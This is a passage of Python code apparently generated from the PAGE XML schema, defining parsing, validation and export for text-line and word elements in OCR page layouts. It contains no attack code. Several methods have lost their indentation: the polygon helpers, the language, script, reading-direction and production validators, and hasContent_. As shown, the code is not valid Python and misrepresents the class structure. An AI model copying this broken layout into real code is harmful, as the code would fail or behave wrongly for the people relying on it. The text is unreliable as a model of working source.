    def build(self, node, gds_collector_=None):
        """Populate this instance from an ElementTree/lxml *node*.

        Parses attributes, then recurses into child elements.
        Returns self to allow chaining.
        """
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            # Strip the namespace from the child tag before dispatching.
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Read this element's XML attributes from *node*, validating the
        enumeration-typed ones via the validate_* helpers (problems go to
        ``gds_collector_``; parsing continues regardless).
        """
        value = find_attr_value_('id', node)
        if value is not None and 'id' not in already_processed:
            already_processed.add('id')
            self.id = value
        value = find_attr_value_('primaryLanguage', node)
        if value is not None and 'primaryLanguage' not in already_processed:
            already_processed.add('primaryLanguage')
            self.primaryLanguage = value
            self.validate_LanguageSimpleType(self.primaryLanguage)    # validate type LanguageSimpleType
        value = find_attr_value_('primaryScript', node)
        if value is not None and 'primaryScript' not in already_processed:
            already_processed.add('primaryScript')
            self.primaryScript = value
            self.validate_ScriptSimpleType(self.primaryScript)    # validate type ScriptSimpleType
        value = find_attr_value_('secondaryScript', node)
        if value is not None and 'secondaryScript' not in already_processed:
            already_processed.add('secondaryScript')
            self.secondaryScript = value
            self.validate_ScriptSimpleType(self.secondaryScript)    # validate type ScriptSimpleType
        value = find_attr_value_('readingDirection', node)
        if value is not None and 'readingDirection' not in already_processed:
            already_processed.add('readingDirection')
            self.readingDirection = value
            self.validate_ReadingDirectionSimpleType(self.readingDirection)    # validate type ReadingDirectionSimpleType
        value = find_attr_value_('production', node)
        if value is not None and 'production' not in already_processed:
            already_processed.add('production')
            self.production = value
            self.validate_ProductionSimpleType(self.production)    # validate type ProductionSimpleType
        value = find_attr_value_('custom', node)
        if value is not None and 'custom' not in already_processed:
            already_processed.add('custom')
            self.custom = value
        value = find_attr_value_('comments', node)
        if value is not None and 'comments' not in already_processed:
            already_processed.add('comments')
            self.comments = value
        value = find_attr_value_('index', node)
        if value is not None and 'index' not in already_processed:
            already_processed.add('index')
            self.index = self.gds_parse_integer(value, node, 'index')
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        """Dispatch on the child tag name, build the matching child object
        and attach it (append for list-valued children, assign otherwise).
        Unknown tags are silently ignored.
        """
        if nodeName_ == 'AlternativeImage':
            obj_ = AlternativeImageType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.AlternativeImage.append(obj_)
            obj_.original_tagname_ = 'AlternativeImage'
        elif nodeName_ == 'Coords':
            obj_ = CoordsType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.Coords = obj_
            obj_.original_tagname_ = 'Coords'
        elif nodeName_ == 'Baseline':
            obj_ = BaselineType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.Baseline = obj_
            obj_.original_tagname_ = 'Baseline'
        elif nodeName_ == 'Word':
            obj_ = WordType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.Word.append(obj_)
            obj_.original_tagname_ = 'Word'
        elif nodeName_ == 'TextEquiv':
            obj_ = TextEquivType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.TextEquiv.append(obj_)
            obj_.original_tagname_ = 'TextEquiv'
        elif nodeName_ == 'TextStyle':
            obj_ = TextStyleType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.TextStyle = obj_
            obj_.original_tagname_ = 'TextStyle'
        elif nodeName_ == 'UserDefined':
            obj_ = UserDefinedType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.UserDefined = obj_
            obj_.original_tagname_ = 'UserDefined'
        elif nodeName_ == 'Labels':
            obj_ = LabelsType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.Labels.append(obj_)
            obj_.original_tagname_ = 'Labels'
def get_polygon(self):
'''
Get polygon from element which is parent of a Coords element
'''
points = [point for point in self.Coords.points.split(' ')]
return [[int(coord) for coord in point.split(',')] for point in points]
def get_polygon_string(self):
'''
Get polygon string from element which is parent of a Coords element
'''
return self.Coords.points.replace(' ', ',')
# end class TextLineType
class WordType(GeneratedsSuper):
    """A single word within a text line (PAGE schema WordType).

    Attributes override the corresponding attributes of the parent text
    line and/or text region:
    - language: overrides the primaryLanguage of the parent
    - primaryScript / secondaryScript: scripts used in the word
    - readingDirection: order in which characters should be read
    - production: overrides the production attribute of the parent
    - custom: for generic use
    """
    __hash__ = GeneratedsSuper.__hash__
    # Schema-derived member specs; generated by generateDS from the PAGE
    # 2019-07-15 schema -- do not edit by hand.
    member_data_items_ = [
        MemberSpec_('id', 'string', 0, 0, {'use': 'required'}),
        MemberSpec_('language', 'pc:LanguageSimpleType', 0, 1, {'use': 'optional'}),
        MemberSpec_('primaryScript', 'pc:ScriptSimpleType', 0, 1, {'use': 'optional'}),
        MemberSpec_('secondaryScript', 'pc:ScriptSimpleType', 0, 1, {'use': 'optional'}),
        MemberSpec_('readingDirection', 'pc:ReadingDirectionSimpleType', 0, 1, {'use': 'optional'}),
        MemberSpec_('production', 'pc:ProductionSimpleType', 0, 1, {'use': 'optional'}),
        MemberSpec_('custom', 'string', 0, 1, {'use': 'optional'}),
        MemberSpec_('comments', 'string', 0, 1, {'use': 'optional'}),
        MemberSpec_('AlternativeImage', 'AlternativeImageType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'AlternativeImage', 'type': 'AlternativeImageType'}, None),
        MemberSpec_('Coords', 'CoordsType', 0, 0, {'name': 'Coords', 'type': 'CoordsType'}, None),
        MemberSpec_('Glyph', 'GlyphType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'Glyph', 'type': 'GlyphType'}, None),
        MemberSpec_('TextEquiv', 'TextEquivType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'TextEquiv', 'type': 'TextEquivType'}, None),
        MemberSpec_('TextStyle', 'TextStyleType', 0, 1, {'minOccurs': '0', 'name': 'TextStyle', 'type': 'TextStyleType'}, None),
        MemberSpec_('UserDefined', 'UserDefinedType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'UserDefined', 'type': 'UserDefinedType'}, None),
        MemberSpec_('Labels', 'LabelsType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'Labels', 'type': 'LabelsType'}, None),
    ]
    # Hooks for the generateDS subclass-override mechanism (see factory()).
    subclass = None
    superclass = None
    def __init__(self, id=None, language=None, primaryScript=None, secondaryScript=None, readingDirection=None, production=None, custom=None, comments=None, AlternativeImage=None, Coords=None, Glyph=None, TextEquiv=None, TextStyle=None, UserDefined=None, Labels=None, gds_collector_=None, **kwargs_):
        """Initialize a WordType element.

        Lower-case arguments map to XML attributes; capitalized arguments
        map to child elements.  List-valued children (AlternativeImage,
        Glyph, TextEquiv, Labels) default to fresh empty lists.
        """
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        # XML attributes (scalars, cast on assignment).
        self.id = _cast(None, id)
        self.id_nsprefix_ = None
        self.language = _cast(None, language)
        self.language_nsprefix_ = None
        self.primaryScript = _cast(None, primaryScript)
        self.primaryScript_nsprefix_ = None
        self.secondaryScript = _cast(None, secondaryScript)
        self.secondaryScript_nsprefix_ = None
        self.readingDirection = _cast(None, readingDirection)
        self.readingDirection_nsprefix_ = None
        self.production = _cast(None, production)
        self.production_nsprefix_ = None
        self.custom = _cast(None, custom)
        self.custom_nsprefix_ = None
        self.comments = _cast(None, comments)
        self.comments_nsprefix_ = None
        # Child elements.
        if AlternativeImage is None:
            self.AlternativeImage = []
        else:
            self.AlternativeImage = AlternativeImage
        self.AlternativeImage_nsprefix_ = "pc"
        self.Coords = Coords
        self.Coords_nsprefix_ = "pc"
        if Glyph is None:
            self.Glyph = []
        else:
            self.Glyph = Glyph
        self.Glyph_nsprefix_ = "pc"
        if TextEquiv is None:
            self.TextEquiv = []
        else:
            self.TextEquiv = TextEquiv
        self.TextEquiv_nsprefix_ = "pc"
        self.TextStyle = TextStyle
        self.TextStyle_nsprefix_ = "pc"
        self.UserDefined = UserDefined
        self.UserDefined_nsprefix_ = "pc"
        if Labels is None:
            self.Labels = []
        else:
            self.Labels = Labels
        self.Labels_nsprefix_ = "pc"
    def factory(*args_, **kwargs_):
        # Factory honoring generateDS's subclass-override hook: if an
        # external module registered a replacement for WordType,
        # instantiate that instead of the base class.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, WordType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if WordType.subclass:
            return WordType.subclass(*args_, **kwargs_)
        else:
            return WordType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Generated accessors for the namespace prefix and the AlternativeImage,
    # Coords and Glyph children.
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_AlternativeImage(self):
        return self.AlternativeImage
    def set_AlternativeImage(self, AlternativeImage):
        self.AlternativeImage = AlternativeImage
    def add_AlternativeImage(self, value):
        self.AlternativeImage.append(value)
    def insert_AlternativeImage_at(self, index, value):
        self.AlternativeImage.insert(index, value)
    def replace_AlternativeImage_at(self, index, value):
        self.AlternativeImage[index] = value
    def get_Coords(self):
        return self.Coords
    def set_Coords(self, Coords):
        self.Coords = Coords
    def get_Glyph(self):
        return self.Glyph
    def set_Glyph(self, Glyph):
        self.Glyph = Glyph
    def add_Glyph(self, value):
        self.Glyph.append(value)
    def insert_Glyph_at(self, index, value):
        self.Glyph.insert(index, value)
    def replace_Glyph_at(self, index, value):
        self.Glyph[index] = value
    # Generated accessors for TextEquiv (list), TextStyle, UserDefined and
    # Labels (list) children.
    def get_TextEquiv(self):
        return self.TextEquiv
    def set_TextEquiv(self, TextEquiv):
        self.TextEquiv = TextEquiv
    def add_TextEquiv(self, value):
        self.TextEquiv.append(value)
    def insert_TextEquiv_at(self, index, value):
        self.TextEquiv.insert(index, value)
    def replace_TextEquiv_at(self, index, value):
        self.TextEquiv[index] = value
    def get_TextStyle(self):
        return self.TextStyle
    def set_TextStyle(self, TextStyle):
        self.TextStyle = TextStyle
    def get_UserDefined(self):
        return self.UserDefined
    def set_UserDefined(self, UserDefined):
        self.UserDefined = UserDefined
    def get_Labels(self):
        return self.Labels
    def set_Labels(self, Labels):
        self.Labels = Labels
    def add_Labels(self, value):
        self.Labels.append(value)
    def insert_Labels_at(self, index, value):
        self.Labels.insert(index, value)
    def replace_Labels_at(self, index, value):
        self.Labels[index] = value
    # Generated accessors for the XML attributes of this element.
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_language(self):
        return self.language
    def set_language(self, language):
        self.language = language
    def get_primaryScript(self):
        return self.primaryScript
    def set_primaryScript(self, primaryScript):
        self.primaryScript = primaryScript
    def get_secondaryScript(self):
        return self.secondaryScript
    def set_secondaryScript(self, secondaryScript):
        self.secondaryScript = secondaryScript
    def get_readingDirection(self):
        return self.readingDirection
    def set_readingDirection(self, readingDirection):
        self.readingDirection = readingDirection
    def get_production(self):
        return self.production
    def set_production(self, production):
        self.production = production
    def get_custom(self):
        return self.custom
    def set_custom(self, custom):
        self.custom = custom
    def get_comments(self):
        return self.comments
    def set_comments(self, comments):
        self.comments = comments
def validate_LanguageSimpleType(self, value):
# Validate type pc:LanguageSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['Abkhaz', 'Afar', 'Afrikaans', 'Akan', 'Albanian', 'Amharic', 'Arabic', 'Aragonese', 'Armenian', 'Assamese', 'Avaric', 'Avestan', 'Aymara', 'Azerbaijani', 'Bambara', 'Bashkir', 'Basque', 'Belarusian', 'Bengali', 'Bihari', 'Bislama', 'Bosnian', 'Breton', 'Bulgarian', 'Burmese', 'Cambodian', 'Cantonese', 'Catalan', 'Chamorro', 'Chechen', 'Chichewa', 'Chinese', 'Chuvash', 'Cornish', 'Corsican', 'Cree', 'Croatian', 'Czech', 'Danish', 'Divehi', 'Dutch', 'Dzongkha', 'English', 'Esperanto', 'Estonian', 'Ewe', 'Faroese', 'Fijian', 'Finnish', 'French', 'Fula', 'Gaelic', 'Galician', 'Ganda', 'Georgian', 'German', 'Greek', 'Guaraní', 'Gujarati', 'Haitian', 'Hausa', 'Hebrew', 'Herero', 'Hindi', 'Hiri Motu', 'Hungarian', 'Icelandic', 'Ido', 'Igbo', 'Indonesian', 'Interlingua', 'Interlingue', 'Inuktitut', 'Inupiaq', 'Irish', 'Italian', 'Japanese', 'Javanese', 'Kalaallisut', 'Kannada', 'Kanuri', 'Kashmiri', 'Kazakh', 'Khmer', 'Kikuyu', 'Kinyarwanda', 'Kirundi', 'Komi', 'Kongo', 'Korean', 'Kurdish', 'Kwanyama', 'Kyrgyz', 'Lao', 'Latin', 'Latvian', 'Limburgish', 'Lingala', 'Lithuanian', 'Luba-Katanga', 'Luxembourgish', 'Macedonian', 'Malagasy', 'Malay', 'Malayalam', 'Maltese', 'Manx', 'Māori', 'Marathi', 'Marshallese', 'Mongolian', 'Nauru', 'Navajo', 'Ndonga', 'Nepali', 'North Ndebele', 'Northern Sami', 'Norwegian', 'Norwegian Bokmål', 'Norwegian Nynorsk', 'Nuosu', 'Occitan', 'Ojibwe', 'Old Church Slavonic', 'Oriya', 'Oromo', 'Ossetian', 'Pāli', 'Panjabi', 'Pashto', 'Persian', 'Polish', 'Portuguese', 'Punjabi', 'Quechua', 'Romanian', 'Romansh', 'Russian', 'Samoan', 'Sango', 'Sanskrit', 'Sardinian', 'Serbian', 'Shona', 'Sindhi', 'Sinhala', 'Slovak', 'Slovene', 'Somali', 'South Ndebele', 'Southern Sotho', 'Spanish', 'Sundanese', 'Swahili', 'Swati', 'Swedish', 'Tagalog', 'Tahitian', 'Tajik', 'Tamil', 'Tatar', 'Telugu', 'Thai', 'Tibetan', 'Tigrinya', 'Tonga', 'Tsonga', 'Tswana', 'Turkish', 'Turkmen', 'Twi', 'Uighur', 'Ukrainian', 'Urdu', 'Uzbek', 'Venda', 'Vietnamese', 
'Volapük', 'Walloon', 'Welsh', 'Western Frisian', 'Wolof', 'Xhosa', 'Yiddish', 'Yoruba', 'Zhuang', 'Zulu', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on LanguageSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def validate_ScriptSimpleType(self, value):
# Validate type pc:ScriptSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['Adlm - Adlam', 'Afak - Afaka', 'Aghb - Caucasian Albanian', 'Ahom - Ahom, Tai Ahom', 'Arab - Arabic', 'Aran - Arabic (Nastaliq variant)', 'Armi - Imperial Aramaic', 'Armn - Armenian', 'Avst - Avestan', 'Bali - Balinese', 'Bamu - Bamum', 'Bass - Bassa Vah', 'Batk - Batak', 'Beng - Bengali', 'Bhks - Bhaiksuki', 'Blis - Blissymbols', 'Bopo - Bopomofo', 'Brah - Brahmi', 'Brai - Braille', 'Bugi - Buginese', 'Buhd - Buhid', 'Cakm - Chakma', 'Cans - Unified Canadian Aboriginal Syllabics', 'Cari - Carian', 'Cham - Cham', 'Cher - Cherokee', 'Cirt - Cirth', 'Copt - Coptic', 'Cprt - Cypriot', 'Cyrl - Cyrillic', 'Cyrs - Cyrillic (Old Church Slavonic variant)', 'Deva - Devanagari (Nagari)', 'Dsrt - Deseret (Mormon)', 'Dupl - Duployan shorthand, Duployan stenography', 'Egyd - Egyptian demotic', 'Egyh - Egyptian hieratic', 'Egyp - Egyptian hieroglyphs', 'Elba - Elbasan', 'Ethi - Ethiopic', 'Geok - Khutsuri (Asomtavruli and Nuskhuri)', 'Geor - Georgian (Mkhedruli)', 'Glag - Glagolitic', 'Goth - Gothic', 'Gran - Grantha', 'Grek - Greek', 'Gujr - Gujarati', 'Guru - Gurmukhi', 'Hanb - Han with Bopomofo', 'Hang - Hangul', 'Hani - Han (Hanzi, Kanji, Hanja)', 'Hano - Hanunoo (Hanunóo)', 'Hans - Han (Simplified variant)', 'Hant - Han (Traditional variant)', 'Hatr - Hatran', 'Hebr - Hebrew', 'Hira - Hiragana', 'Hluw - Anatolian Hieroglyphs', 'Hmng - Pahawh Hmong', 'Hrkt - Japanese syllabaries', 'Hung - Old Hungarian (Hungarian Runic)', 'Inds - Indus (Harappan)', 'Ital - Old Italic (Etruscan, Oscan etc.)', 'Jamo - Jamo', 'Java - Javanese', 'Jpan - Japanese', 'Jurc - Jurchen', 'Kali - Kayah Li', 'Kana - Katakana', 'Khar - Kharoshthi', 'Khmr - Khmer', 'Khoj - Khojki', 'Kitl - Khitan large script', 'Kits - Khitan small script', 'Knda - Kannada', 'Kore - Korean (alias for Hangul + Han)', 'Kpel - Kpelle', 'Kthi - Kaithi', 'Lana - Tai Tham (Lanna)', 'Laoo - Lao', 'Latf - Latin (Fraktur variant)', 'Latg - Latin (Gaelic variant)', 'Latn - Latin', 'Leke - Leke', 'Lepc - Lepcha 
(Róng)', 'Limb - Limbu', 'Lina - Linear A', 'Linb - Linear B', 'Lisu - Lisu (Fraser)', 'Loma - Loma', 'Lyci - Lycian', 'Lydi - Lydian', 'Mahj - Mahajani', 'Mand - Mandaic, Mandaean', 'Mani - Manichaean', 'Marc - Marchen', 'Maya - Mayan hieroglyphs', 'Mend - Mende Kikakui', 'Merc - Meroitic Cursive', 'Mero - Meroitic Hieroglyphs', 'Mlym - Malayalam', 'Modi - Modi, Moḍī', 'Mong - Mongolian', 'Moon - Moon (Moon code, Moon script, Moon type)', 'Mroo - Mro, Mru', 'Mtei - Meitei Mayek (Meithei, Meetei)', 'Mult - Multani', 'Mymr - Myanmar (Burmese)', 'Narb - Old North Arabian (Ancient North Arabian)', 'Nbat - Nabataean', 'Newa - Newa, Newar, Newari', 'Nkgb - Nakhi Geba', 'Nkoo - N’Ko', 'Nshu - Nüshu', 'Ogam - Ogham', 'Olck - Ol Chiki (Ol Cemet’, Ol, Santali)', 'Orkh - Old Turkic, Orkhon Runic', 'Orya - Oriya', 'Osge - Osage', 'Osma - Osmanya', 'Palm - Palmyrene', 'Pauc - Pau Cin Hau', 'Perm - Old Permic', 'Phag - Phags-pa', 'Phli - Inscriptional Pahlavi', 'Phlp - Psalter Pahlavi', 'Phlv - Book Pahlavi', 'Phnx - Phoenician', 'Piqd - Klingon (KLI pIqaD)', 'Plrd - Miao (Pollard)', 'Prti - Inscriptional Parthian', 'Rjng - Rejang (Redjang, Kaganga)', 'Roro - Rongorongo', 'Runr - Runic', 'Samr - Samaritan', 'Sara - Sarati', 'Sarb - Old South Arabian', 'Saur - Saurashtra', 'Sgnw - SignWriting', 'Shaw - Shavian (Shaw)', 'Shrd - Sharada, Śāradā', 'Sidd - Siddham', 'Sind - Khudawadi, Sindhi', 'Sinh - Sinhala', 'Sora - Sora Sompeng', 'Sund - Sundanese', 'Sylo - Syloti Nagri', 'Syrc - Syriac', 'Syre - Syriac (Estrangelo variant)', 'Syrj - Syriac (Western variant)', 'Syrn - Syriac (Eastern variant)', 'Tagb - Tagbanwa', 'Takr - Takri', 'Tale - Tai Le', 'Talu - New Tai Lue', 'Taml - Tamil', 'Tang - Tangut', 'Tavt - Tai Viet', 'Telu - Telugu', 'Teng - Tengwar', 'Tfng - Tifinagh (Berber)', 'Tglg - Tagalog (Baybayin, Alibata)', 'Thaa - Thaana', 'Thai - Thai', 'Tibt - Tibetan', 'Tirh - Tirhuta', 'Ugar - Ugaritic', 'Vaii - Vai', 'Visp - Visible Speech', 'Wara - Warang Citi (Varang Kshiti)', 
'Wole - Woleai', 'Xpeo - Old Persian', 'Xsux - Cuneiform, Sumero-Akkadian', 'Yiii - Yi', 'Zinh - Code for inherited script', 'Zmth - Mathematical notation', 'Zsye - Symbols (Emoji variant)', 'Zsym - Symbols', 'Zxxx - Code for unwritten documents', 'Zyyy - Code for undetermined script', 'Zzzz - Code for uncoded script', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ScriptSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def validate_ReadingDirectionSimpleType(self, value):
# Validate type pc:ReadingDirectionSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['left-to-right', 'right-to-left', 'top-to-bottom', 'bottom-to-top']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ReadingDirectionSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def validate_ProductionSimpleType(self, value):
# Validate type pc:ProductionSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['printed', 'typewritten', 'handwritten-cursive', 'handwritten-printscript', 'medieval-manuscript', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ProductionSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def hasContent_(self):
if (
self.AlternativeImage or
self.Coords is not None or
self.Glyph or
self.TextEquiv or
self.TextStyle is not None or
self.UserDefined is not None or
self.Labels
):
return True
else:
return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='WordType', pretty_print=True):
        """Serialize this element to *outfile* as XML at indentation *level*:
        opening tag with attributes, children (if any), closing tag.
        Writes a self-closing tag when there is no child content."""
        # Allow an externally registered namespace definition to override the default.
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('WordType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        # Use the tag name the element was originally parsed with, if known.
        if self.original_tagname_ is not None and name_ == 'WordType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='WordType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='WordType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            # No children: emit a self-closing element.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='WordType'):
        """Write this element's XML attributes (id, language, scripts,
        readingDirection, production, custom, comments) to *outfile*,
        skipping attributes that are None or already emitted."""
        if self.id is not None and 'id' not in already_processed:
            already_processed.add('id')
            outfile.write(' id=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.id), input_name='id')), ))
        if self.language is not None and 'language' not in already_processed:
            already_processed.add('language')
            outfile.write(' language=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.language), input_name='language')), ))
        if self.primaryScript is not None and 'primaryScript' not in already_processed:
            already_processed.add('primaryScript')
            outfile.write(' primaryScript=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.primaryScript), input_name='primaryScript')), ))
        if self.secondaryScript is not None and 'secondaryScript' not in already_processed:
            already_processed.add('secondaryScript')
            outfile.write(' secondaryScript=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.secondaryScript), input_name='secondaryScript')), ))
        if self.readingDirection is not None and 'readingDirection' not in already_processed:
            already_processed.add('readingDirection')
            outfile.write(' readingDirection=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.readingDirection), input_name='readingDirection')), ))
        if self.production is not None and 'production' not in already_processed:
            already_processed.add('production')
            outfile.write(' production=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.production), input_name='production')), ))
        if self.custom is not None and 'custom' not in already_processed:
            already_processed.add('custom')
            outfile.write(' custom=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.custom), input_name='custom')), ))
        if self.comments is not None and 'comments' not in already_processed:
            already_processed.add('comments')
            outfile.write(' comments=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.comments), input_name='comments')), ))
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='WordType', fromsubclass_=False, pretty_print=True):
        """Serialize this element's children to *outfile* in schema order:
        AlternativeImage*, Coords?, Glyph*, TextEquiv*, TextStyle?,
        UserDefined?, Labels*."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        for AlternativeImage_ in self.AlternativeImage:
            namespaceprefix_ = self.AlternativeImage_nsprefix_ + ':' if (UseCapturedNS_ and self.AlternativeImage_nsprefix_) else ''
            AlternativeImage_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='AlternativeImage', pretty_print=pretty_print)
        if self.Coords is not None:
            namespaceprefix_ = self.Coords_nsprefix_ + ':' if (UseCapturedNS_ and self.Coords_nsprefix_) else ''
            self.Coords.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Coords', pretty_print=pretty_print)
        for Glyph_ in self.Glyph:
            namespaceprefix_ = self.Glyph_nsprefix_ + ':' if (UseCapturedNS_ and self.Glyph_nsprefix_) else ''
            Glyph_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Glyph', pretty_print=pretty_print)
        for TextEquiv_ in self.TextEquiv:
            namespaceprefix_ = self.TextEquiv_nsprefix_ + ':' if (UseCapturedNS_ and self.TextEquiv_nsprefix_) else ''
            TextEquiv_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='TextEquiv', pretty_print=pretty_print)
        if self.TextStyle is not None:
            namespaceprefix_ = self.TextStyle_nsprefix_ + ':' if (UseCapturedNS_ and self.TextStyle_nsprefix_) else ''
            self.TextStyle.export(outfile, level, namespaceprefix_, namespacedef_='', name_='TextStyle', pretty_print=pretty_print)
        if self.UserDefined is not None:
            namespaceprefix_ = self.UserDefined_nsprefix_ + ':' if (UseCapturedNS_ and self.UserDefined_nsprefix_) else ''
            self.UserDefined.export(outfile, level, namespaceprefix_, namespacedef_='', name_='UserDefined', pretty_print=pretty_print)
        for Labels_ in self.Labels:
            namespaceprefix_ = self.Labels_nsprefix_ + ':' if (UseCapturedNS_ and self.Labels_nsprefix_) else ''
            Labels_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Labels', pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        """Populate this instance from an ElementTree/lxml *node*: parse its
        attributes, then recurse into each child element.  Returns self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            # Strip any namespace qualifier from the child tag name.
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Read this element's XML attributes from *node*, storing each on
        the instance and running the schema-derived enum validators."""
        value = find_attr_value_('id', node)
        if value is not None and 'id' not in already_processed:
            already_processed.add('id')
            self.id = value
        value = find_attr_value_('language', node)
        if value is not None and 'language' not in already_processed:
            already_processed.add('language')
            self.language = value
            self.validate_LanguageSimpleType(self.language)    # validate type LanguageSimpleType
        value = find_attr_value_('primaryScript', node)
        if value is not None and 'primaryScript' not in already_processed:
            already_processed.add('primaryScript')
            self.primaryScript = value
            self.validate_ScriptSimpleType(self.primaryScript)    # validate type ScriptSimpleType
        value = find_attr_value_('secondaryScript', node)
        if value is not None and 'secondaryScript' not in already_processed:
            already_processed.add('secondaryScript')
            self.secondaryScript = value
            self.validate_ScriptSimpleType(self.secondaryScript)    # validate type ScriptSimpleType
        value = find_attr_value_('readingDirection', node)
        if value is not None and 'readingDirection' not in already_processed:
            already_processed.add('readingDirection')
            self.readingDirection = value
            self.validate_ReadingDirectionSimpleType(self.readingDirection)    # validate type ReadingDirectionSimpleType
        value = find_attr_value_('production', node)
        if value is not None and 'production' not in already_processed:
            already_processed.add('production')
            self.production = value
